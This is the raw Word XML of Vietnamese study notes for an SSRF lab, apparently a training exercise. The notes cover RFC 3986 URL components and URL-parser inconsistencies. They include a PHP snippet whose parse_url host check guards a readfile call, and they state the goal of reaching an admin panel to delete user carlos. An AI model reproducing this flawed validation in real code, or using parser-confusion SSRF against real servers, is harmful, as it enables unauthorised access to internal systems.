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D5658" w14:textId="4A4F5B2E" w:rsidR="002F49FE" w:rsidRPr="005D5781" w:rsidRDefault="00F212AF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D5781">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Để làm được bài này, mình phải nghiên cứu tài liệu trước.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6169D81D" w14:textId="3494B9A9" w:rsidR="00F212AF" w:rsidRDefault="00F212AF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A35C2A" w14:textId="1734541D" w:rsidR="00F212AF" w:rsidRDefault="00F212AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D5781">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Một kỉ nguyên mới của </w:t>
      </w:r>
      <w:r w:rsidR="005D5781" w:rsidRPr="005D5781">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidR="005D5781">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8B910F" w14:textId="1A23E551" w:rsidR="005D5781" w:rsidRDefault="005D5781">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7721A393" w14:textId="77777777" w:rsidR="005D5781" w:rsidRPr="005D5781" w:rsidRDefault="005D5781">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D5781">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Những vấn đề của phân tích cú pháp URL: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E21068D" w14:textId="523284E8" w:rsidR="005D5781" w:rsidRPr="005D5781" w:rsidRDefault="005D5781">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D5781">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tập trung vào sự mâu thuẫn giữa Url parser và Url requester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F6FF76" w14:textId="77777777" w:rsidR="005D5781" w:rsidRPr="005D5781" w:rsidRDefault="005D5781">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD1A0B3" w14:textId="1422BF0A" w:rsidR="005D5781" w:rsidRDefault="005D5781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Tại sao xác thực dựa trên url lại khó? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140798F5" w14:textId="262C5A34" w:rsidR="005D5781" w:rsidRPr="00270C89" w:rsidRDefault="005D5781" w:rsidP="00270C89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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00270C89">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Việc phân tích cú pháp trên Url của mỗi ngôn ngữ là khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8D33F7" w14:textId="79BE95D6" w:rsidR="00270C89" w:rsidRPr="00270C89" w:rsidRDefault="00270C89" w:rsidP="00270C89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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00270C89">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RFC 3986</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26488AD1" w14:textId="48022D52" w:rsidR="005D5781" w:rsidRDefault="005D5781">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169181E0" w14:textId="00241B67" w:rsidR="005D5781" w:rsidRDefault="005D5781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Các thành phần của Url</w:t>
      </w:r>
      <w:r w:rsidR="00270C89">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RFC 3986) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF09E9D" w14:textId="718DAE9B" w:rsidR="00270C89" w:rsidRDefault="00270C89">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A96AF4F" w14:textId="7EC66236" w:rsidR="00270C89" w:rsidRDefault="0035730F" w:rsidP="0035730F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1418"/>
          <w:tab w:val="left" w:pos="5103"/>
        </w:tabs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ab/>
        <w:t>Authority</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9FFFD1" w14:textId="330712C1" w:rsidR="00270C89" w:rsidRDefault="0035730F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CF83D1" wp14:editId="32D9BE72">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3024257</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>92682</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="941457" cy="250356"/>
                <wp:effectExtent l="12700" t="12700" r="24130" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="2" name="Left-Right-Up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457" cy="250356"/>
                        </a:xfrm>
                        <a:prstGeom prst="leftRigh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C6418" id="Left-Right-Up Arrow 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:238.15pt;margin-top:7.3pt;width:74.15pt;height:19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41457,250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" path="m,187767l62589,125178r,31295l439434,156473r,-93884l408140,62589,470729,r62589,62589l502023,62589r,93884l878868,156473r,-31295l941457,187767r-62589,62589l878868,219062r-816279,l62589,250356,,187767xe" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,187767;62589,125178;62589,156473;439434,156473;439434,62589;408140,62589;470729,0;533318,62589;502023,62589;502023,156473;878868,156473;878868,125178;941457,187767;878868,250356;878868,219062;62589,219062;62589,250356;0,187767" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00270C89">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="tex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FB4F4A" wp14:editId="7A2EBE82">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>469900</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>89923</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1587500" cy="253254"/>
                <wp:effectExtent l="12700" t="12700" r="25400" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="5" name="Left-Right-Up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0" cy="253254"/>
                        </a:xfrm>
                        <a:prstGeom prst="leftRigh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4C213" id="Left-Right-Up Arrow 5" o:spid="_x0000_s1026" style="position:absolute;margin-left:37pt;margin-top:7.1pt;width:125pt;height:19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87500,25325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" path="m,189941l63314,126627r,31657l762093,158284r,-94970l730437,63314,793750,r63314,63314l825407,63314r,94970l1524187,158284r,-31657l1587500,189941r-63313,63313l1524187,221597r-1460873,l63314,253254,,189941xe" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,189941;63314,126627;63314,158284;762093,158284;762093,63314;730437,63314;793750,0;857064,63314;825407,63314;825407,158284;1524187,158284;1524187,126627;1587500,189941;1524187,253254;1524187,221597;63314,221597;63314,253254;0,189941" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDEB75C" w14:textId="62F02D4F" w:rsidR="00270C89" w:rsidRDefault="00270C89">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0334C3F9" w14:textId="543810B3" w:rsidR="00270C89" w:rsidRPr="00270C89" w:rsidRDefault="00270C89">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00270C89">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>foo://example.com:8042/over/there?name=bar#nose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD2B630" w14:textId="4F231B19" w:rsidR="00270C89" w:rsidRDefault="0035730F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741347" wp14:editId="5E243CAB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4087164</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>35587</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="593587" cy="188596"/>
                <wp:effectExtent l="12700" t="12700" r="16510" b="27305"/>
                <wp:wrapNone/>
                <wp:docPr id="1" name="Left-Right-Up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93587" cy="188596"/>
                        </a:xfrm>
                        <a:prstGeom prst="leftRigh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2ED35C" id="Left-Right-Up Arrow 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:321.8pt;margin-top:2.8pt;width:46.75pt;height:14.85pt;rotation:180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93587,18859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" path="m,141447l47149,94298r,23575l273219,117873r,-70724l249645,47149,296794,r47149,47149l320368,47149r,70724l546438,117873r,-23575l593587,141447r-47149,47149l546438,165022r-499289,l47149,188596,,141447xe" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,141447;47149,94298;47149,117873;273219,117873;273219,47149;249645,47149;296794,0;343943,47149;320368,47149;320368,117873;546438,117873;546438,94298;593587,141447;546438,188596;546438,165022;47149,165022;47149,188596;0,141447" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0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4BC27A" wp14:editId="652A6C33">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2119630</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>38764</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="961334" cy="208473"/>
                <wp:effectExtent l="12700" t="12700" r="29845" b="20320"/>
                <wp:wrapNone/>
                <wp:docPr id="3" name="Left-Right-Up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61334" cy="208473"/>
                        </a:xfrm>
                        <a:prstGeom prst="leftRigh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084B9" id="Left-Right-Up Arrow 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:166.9pt;margin-top:3.05pt;width:75.7pt;height:16.4pt;rotation:18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1334,2084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" path="m,156355l52118,104237r,26059l454608,130296r,-78178l428549,52118,480667,r52118,52118l506726,52118r,78178l909216,130296r,-26059l961334,156355r-52118,52118l909216,182414r-857098,l52118,208473,,156355xe" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,156355;52118,104237;52118,130296;454608,130296;454608,52118;428549,52118;480667,0;532785,52118;506726,52118;506726,130296;909216,130296;909216,104237;961334,156355;909216,208473;909216,182414;52118,182414;52118,208473;0,156355" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00270C89">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="tex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2B01B4" wp14:editId="028BAA5F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2374</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>58668</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="325230" cy="241052"/>
                <wp:effectExtent l="12700" t="12700" r="17780" b="26035"/>
                <wp:wrapNone/>
                <wp:docPr id="4" name="Left-Right-Up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25230" cy="241052"/>
                        </a:xfrm>
                        <a:prstGeom prst="leftRigh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EB098" id="Left-Right-Up Arrow 4" o:spid="_x0000_s1026" style="position:absolute;margin-left:.2pt;margin-top:4.6pt;width:25.6pt;height:19pt;rotation:18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5230,24105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" path="m,180789l60263,120526r,30132l132484,150658r,-90395l102352,60263,162615,r60263,60263l192747,60263r,90395l264967,150658r,-30132l325230,180789r-60263,60263l264967,210921r-204704,l60263,241052,,180789xe" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,180789;60263,120526;60263,150658;132484,150658;132484,60263;102352,60263;162615,0;222878,60263;192747,60263;192747,150658;264967,150658;264967,120526;325230,180789;264967,241052;264967,210921;60263,210921;60263,241052;0,180789" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="18867761" w14:textId="5F603D16" w:rsidR="00270C89" w:rsidRDefault="00270C89">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B30E2A5" w14:textId="5993528F" w:rsidR="005D5781" w:rsidRDefault="0035730F" w:rsidP="0035730F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3686"/>
          <w:tab w:val="left" w:pos="6521"/>
        </w:tabs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scheme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>fragment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F80A07" w14:textId="5E4DCBF2" w:rsidR="00270C89" w:rsidRDefault="00270C89">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18FD774D" w14:textId="1DAB46CF" w:rsidR="00270C89" w:rsidRDefault="00BA4C3D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authority= [ userinfo “@” ] host [ “:”  port ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC844B8" w14:textId="3BE86E84" w:rsidR="00BA4C3D" w:rsidRDefault="00BA4C3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE48E20" w14:textId="77777777" w:rsidR="00EC41D5" w:rsidRDefault="00EC41D5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE781DC" w14:textId="1E82CC20" w:rsidR="00BA4C3D" w:rsidRDefault="0062310C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Xem xét đoạn mã PHP sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCA8D20" w14:textId="77777777" w:rsidR="0062310C" w:rsidRDefault="0062310C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB575FF" w14:textId="77777777" w:rsidR="0062310C" w:rsidRPr="0062310C" w:rsidRDefault="0062310C" w:rsidP="0062310C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062310C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$url = 'http://' . $_GET[url];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7CAA5A" w14:textId="77777777" w:rsidR="0062310C" w:rsidRPr="0062310C" w:rsidRDefault="0062310C" w:rsidP="0062310C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062310C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$parsed = parse_url($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA01C0D" w14:textId="77777777" w:rsidR="0062310C" w:rsidRPr="0062310C" w:rsidRDefault="0062310C" w:rsidP="0062310C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062310C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if ( $parsed[port] == 80 &amp;&amp; $parsed[host] == 'google.com') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25612B5D" w14:textId="77777777" w:rsidR="0062310C" w:rsidRPr="0062310C" w:rsidRDefault="0062310C" w:rsidP="0062310C">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062310C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>readfile($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE8DED6" w14:textId="3CB9A344" w:rsidR="0062310C" w:rsidRPr="0062310C" w:rsidRDefault="0062310C" w:rsidP="0062310C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062310C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE7E0C7" w14:textId="7E8EB4EC" w:rsidR="00270C89" w:rsidRDefault="0062310C" w:rsidP="0062310C">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062310C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>die</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(‘You Shall Not Pass’);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BFCD53" w14:textId="1ADD9B54" w:rsidR="0062310C" w:rsidRDefault="0062310C" w:rsidP="0062310C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FEDA36" w14:textId="4727A60D" w:rsidR="005D5781" w:rsidRDefault="0062310C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1AB3863" wp14:editId="75320609">
            <wp:extent cx="3953961" cy="5956143"/>
            <wp:effectExtent l="2222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30512" cy="607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2E1E" w14:textId="61208FEA" w:rsidR="00EC41D5" w:rsidRDefault="00EC41D5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94F8192" wp14:editId="692C3CAC">
            <wp:extent cx="3873060" cy="6007081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16989" cy="607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406B" w14:textId="3BBE1200" w:rsidR="00EC41D5" w:rsidRDefault="00EC41D5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C56EA2" w14:textId="743193D9" w:rsidR="00EC41D5" w:rsidRDefault="00EC41D5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lastRenderedPageBreak/>
        <w:t>Đối với cURL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F691ED5" w14:textId="539FA538" w:rsidR="00EC41D5" w:rsidRDefault="00EC41D5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F5DB163" wp14:editId="770CF4A7">
            <wp:extent cx="3487752" cy="6228935"/>
            <wp:effectExtent l="952" t="0" r="6033" b="6032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07075" cy="62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818F" w14:textId="77777777" w:rsidR="00EC41D5" w:rsidRDefault="00EC41D5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415A3E5E" w14:textId="77777777" w:rsidR="00EC41D5" w:rsidRDefault="00EC41D5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7968EAEE" w14:textId="2D01D9AE" w:rsidR="00EC41D5" w:rsidRDefault="00EC41D5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D91BD97" wp14:editId="72E57FF8">
            <wp:extent cx="3905095" cy="6227478"/>
            <wp:effectExtent l="0" t="5715" r="127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34267" cy="627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9C07" w14:textId="77777777" w:rsidR="00B572B6" w:rsidRDefault="00B572B6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF13D82" w14:textId="780E6C9A" w:rsidR="00B572B6" w:rsidRDefault="00B572B6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C693925" wp14:editId="300BFE22">
            <wp:extent cx="3317240" cy="6248856"/>
            <wp:effectExtent l="0" t="5080" r="508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38239" cy="628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86EF" w14:textId="77777777" w:rsidR="00B572B6" w:rsidRDefault="00B572B6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26AA6BE5" w14:textId="77777777" w:rsidR="00B572B6" w:rsidRDefault="00B572B6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A23CBD2" w14:textId="5BA9332D" w:rsidR="00B572B6" w:rsidRDefault="00B572B6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51D209D" wp14:editId="57264F53">
            <wp:extent cx="3734017" cy="6230620"/>
            <wp:effectExtent l="0" t="381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59937" cy="627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A6C7" w14:textId="72F9F473" w:rsidR="00EC41D5" w:rsidRDefault="00EC41D5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8985371" wp14:editId="579A3DBC">
            <wp:extent cx="3945255" cy="6169053"/>
            <wp:effectExtent l="5715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54723" cy="618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40DB" w14:textId="525C1954" w:rsidR="00B572B6" w:rsidRDefault="00B572B6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3244983D" w14:textId="680CEB44" w:rsidR="00B572B6" w:rsidRDefault="00FC7BA5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Bắt đầu làm thôi!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AA6BDD" w14:textId="567DD8F0" w:rsidR="00FC7BA5" w:rsidRDefault="00FC7BA5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F84B6D" w14:textId="448C1517" w:rsidR="00FC7BA5" w:rsidRDefault="00FC7BA5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Mục tiêu: truy cập vào giao diện của admin và xóa tài khoản carlos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D11F416" w14:textId="44CDDCF0" w:rsidR="00F57C17" w:rsidRDefault="00F57C17">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
